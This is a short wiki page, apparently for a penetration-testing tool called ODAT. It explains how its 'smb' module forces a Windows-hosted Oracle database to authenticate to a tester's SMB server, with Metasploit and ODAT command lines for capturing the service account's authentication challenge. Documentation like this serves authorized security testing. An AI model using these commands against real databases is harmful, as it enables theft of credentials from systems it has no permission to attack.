-
Notifications
You must be signed in to change notification settings - Fork 345
quentinhardy edited this page Mar 24, 2016
·
2 revisions
This module allows to capture a SMB authentication.
Prerequisite in order to capture a challenge:
- Oracle Database must be installed on Windows
- Oracle Database services must not used a Windows network service account, a system account or a local service account.
Notice: To use this module, a tool to capture SMB authentication must be used (e.g. metasploit or responder).
- In this example, I have used the auxiliary/server/capture/smb metasploit module to capture the SMB authentication:
msfconsole
[...]
msf auxiliary(smb) > use auxiliary/server/capture/smb
msf auxiliary(smb) > run- To make connect the Oracle Database server to our smb server, the following ODAT command can be used :
./odat.py smb -s $SERVER -d $SID -U $USER -P $PASSWORD --capture $MY-IP-ADDRESS SHARE-NAMEQuentin HARDY: quentin.hardy@bt.com or qhardyfr@gmail.com